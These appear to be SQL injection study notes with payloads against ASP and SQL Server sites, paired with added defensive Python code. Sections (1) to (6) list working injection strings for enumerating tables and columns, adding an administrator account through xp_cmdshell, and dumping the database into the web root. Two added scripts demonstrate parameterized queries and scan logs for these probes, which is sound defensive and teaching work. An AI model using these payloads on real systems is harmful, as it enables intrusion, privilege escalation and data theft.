Reviewing SQL injection.
(1)
Quick checks:
1: ; , and 1=1 , and 1=2 ---- by submitting special characters
2: and user>0 --- determines the user name of the current connection
and (select count(*) from sysobjects)>0 -- SQL SERVER
and (select count(*) from myobjects)>0 -- ACCESS
---------------------------------------------------
Based on the system table names specific to each database
---------------------------------------------------
(2)
select * from table where size=num And [query condition]
id=num and (select count(*) from Admin)>0 --- table name
id=num and (select top 1 len(username) from admin)>=0 ---- field length
Same approach for pswd
(Access: asc(char); SQL Server: unicode(char))
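The probes in (1) and (2) only work because the query in (2) is assembled by string concatenation. The following is an added example, not code from the original notes: it builds that concatenated query against a constructed in-memory SQLite database (so len() becomes SQLite's length() and top 1 is not needed), shows that an appended condition decides whether rows come back, and shows the parameterized form in which the same input is rejected before it reaches the database. The table names items and admin, and all rows, are constructed for the example.

```python
import sqlite3

# Constructed sample schema and rows (not from the original notes).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, size INTEGER, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)",
                     [(1, 10, "bolt"), (2, 20, "nut"), (3, 30, "washer")])
    conn.execute("CREATE TABLE admin (username TEXT, pswd TEXT)")
    conn.execute("INSERT INTO admin VALUES ('root', 'secret')")
    return conn

def query_vulnerable(conn, size):
    # The pattern from (2): the request value is pasted into the WHERE
    # clause, so whatever follows the number is executed as SQL.
    sql = "SELECT id, size, name FROM items WHERE size=" + str(size)
    return conn.execute(sql).fetchall()

def query_parameterized(conn, size):
    # Hardened form: validate the type, then bind the value as a
    # parameter. The value can never change the statement's structure.
    size = int(size)          # raises ValueError on "10 AND 1=1"
    sql = "SELECT id, size, name FROM items WHERE size=?"
    return conn.execute(sql, (size,)).fetchall()

def vulnerable_returns_rows(conn, condition):
    # What a boolean-based probe observes: does appending 'AND <condition>'
    # to an otherwise valid value still return rows?
    return len(query_vulnerable(conn, "10 AND " + condition)) > 0

def parameterized_rejects(conn, raw_value):
    # True when the hardened query refuses the input outright.
    try:
        query_parameterized(conn, raw_value)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    for cond in ("1=1", "1=2",
                 "(SELECT count(*) FROM admin)>0",
                 "(SELECT length(username) FROM admin)>=4",
                 "(SELECT length(username) FROM admin)>=5"):
        print(f"{cond:45} -> rows returned: {vulnerable_returns_rows(db, cond)}")
    print("parameterized rejects '10 AND 1=1':",
          parameterized_rejects(db, "10 AND 1=1"))
```

The length probes illustrate why the notes say "field length" can be read out one comparison at a time: with a concatenated query the application's normal page acts as a yes/no oracle. With the bound parameter the same request never produces a query at all, which is the check to enforce on every numeric and string input rather than trying to filter the payloads.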
(3)
id=num ;exec master..xp_cmdshell "net user name pwd /add"
id=num ;exec master..xp_cmdshell "net localgroup administrators name /add"
(With sa privileges this yields system privileges directly)
(4)
id=num ;and db_name()>0 ---- obtains the name of the connected database
id=num ;backup database <database name> to disk=c:\inetpub\wwwroot\1.db;-- --- backs the database up into the web directory, after which it can be downloaded directly over http
(5)
id=num ;and (select Top 1 name from sysobjects where xtype=U and status>0)>0 --- xtype=U and status>0 selects the names of user-created tables
(6)
id=num ;and (select Top 1 col_name(object_id(tablename),1) from sysobjects)>0 ----- having obtained the table name earlier, object_id(tablename) returns the table's internal ID, and col_name(tableID,1) is the table's 1st column name; replacing 1 with 2, 3, 4... retrieves the columns of the guessed table one by one.
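Every probe in (1) through (6) arrives as a single HTTP request and therefore leaves a recognisable trace in the web server's access log. The following is an added example, not code from the original notes: a small Python scanner that URL-decodes each request and tags the patterns listed on this page (boolean conditions, user>0, sysobjects lookups, col_name(object_id(...)), xp_cmdshell, db_name() and backup database ... to disk). The log lines are constructed in combined-log shape with the documentation address 203.0.113.5, a made-up show.asp endpoint and a made-up shop database name; none of it is real traffic.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the probes listed in the notes above.
SIGNATURES = {
    "boolean-probe":     re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "user-check":        re.compile(r"\buser\s*>\s*0", re.I),
    "sysobjects-enum":   re.compile(r"\b(sysobjects|msysobjects|myobjects)\b", re.I),
    "column-enum":       re.compile(r"\bcol_name\s*\(\s*object_id\s*\(", re.I),
    "xp_cmdshell":       re.compile(r"\bxp_cmdshell\b", re.I),
    "db_name-probe":     re.compile(r"\bdb_name\s*\(\s*\)", re.I),
    "backup-to-webroot": re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b", re.I),
}

# Combined log format: ip ident user [time] "METHOD url PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

def classify(url):
    # Decode first: the probes arrive with %3B, %3E, '+' etc. and would
    # otherwise slip past the signatures.
    decoded = unquote_plus(url)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(lines):
    # Returns (ip, raw url, [tags]) for every request that matched a signature.
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        tags = classify(m.group("url"))
        if tags:
            hits.append((m.group("ip"), m.group("url"), tags))
    return hits

# Constructed sample log (documentation address, made-up endpoint and DB name).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /show.asp?id=12 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /show.asp?id=12+and+1%3D1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /show.asp?id=12+and+user%3E0 HTTP/1.1" 500 231',
    '203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /show.asp?id=12+and+(select+count(*)+from+sysobjects)%3E0 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:53 +0000] "GET /show.asp?id=12%3Bexec+master..xp_cmdshell+%22dir%22 HTTP/1.1" 500 231',
    '203.0.113.5 - - [10/Oct/2023:13:55:58 +0000] "GET /show.asp?id=12%3Band+(select+top+1+col_name(object_id(admin),1)+from+sysobjects)%3E0 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /show.asp?id=12%3Bbackup+database+shop+to+disk%3Dc%3A%5Cinetpub%5Cwwwroot%5C1.db%3B-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:56:06 +0000] "GET /show.asp?id=12%3Band+db_name()%3E0 HTTP/1.1" 500 231',
]

if __name__ == "__main__":
    for ip, url, tags in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(tags):35}  {url}")
```

The 500 responses on the user>0 and db_name() lines are the error-based variant the notes rely on: the value is leaked through the conversion error message. That is why a sequence of probes from one client, alternating between 200 and 500, is a stronger signal than any single pattern, and why the web application should return a generic error page rather than the database's own message.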